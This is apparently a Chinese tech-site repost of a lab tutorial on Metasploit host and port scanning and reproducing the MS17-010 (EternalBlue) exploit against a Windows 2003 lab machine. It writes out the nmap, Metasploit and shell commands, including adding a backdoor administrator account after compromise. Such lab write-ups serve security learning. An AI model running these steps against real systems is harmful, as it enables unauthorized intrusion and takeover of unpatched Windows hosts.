IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> ms17_010利用与复现 -> 正文阅读

[网络协议]ms17_010利用与复现

Msf常见模块使用

1. Metasploit?主机扫描

使用metasploit中的modules/auxiliary/scanner/discovery中的arp_sweep或者udp_sweep

arp_sweep使用ARP请求本地局域网中的所有活跃主机

配置选项

检测到的主机

metasploit中的auxiliary/scanner/portscan中的扫描器进行端口扫描

ftpbounce:通过FTP BOUNCE攻击的原理对TCP服务进行枚举;

xmas:一种更为隐蔽的扫描方式,通过发送FIN,PSH,URG标志能够躲避一些TCP标记检测器的过滤;

ack:通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测;

tcp:通过一次完整的TCP链接来判断端口是否开放

syn:使用发送TCP SYN标志的方式探测开放的端口

使用auxiliary/scanner/portscan/tcp 来进行端口扫描

配置选项,查看结果

2.永恒之蓝漏洞利用与复现

靶场环境

一台Kali作为攻击机

一台 win2003作为靶机

Msf中同样可以使用nmap

nmap –script=vuln 192.168.206.136 //找出主机存在的漏洞

确定目标主机存在ms17_010漏洞

搜索ms17_010 search ms17_010

3个模块可利用一个个尝试发现2可以用

Use 2 使用后查看配置选项 show options

配置目标主机

Set RHOSTS 192.168.206.136

执行攻击run

攻击完成

Shell得到目标靶机使用chcp 65001 可以解决乱码问题

至此我们可以执行任意操作创建一个用户,并加入到超级管理员组

net user kun kun /add

net localgroup administrators /add

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-09-15 02:20:34  更:2022-09-15 02:20:39 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/28 6:25:00-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计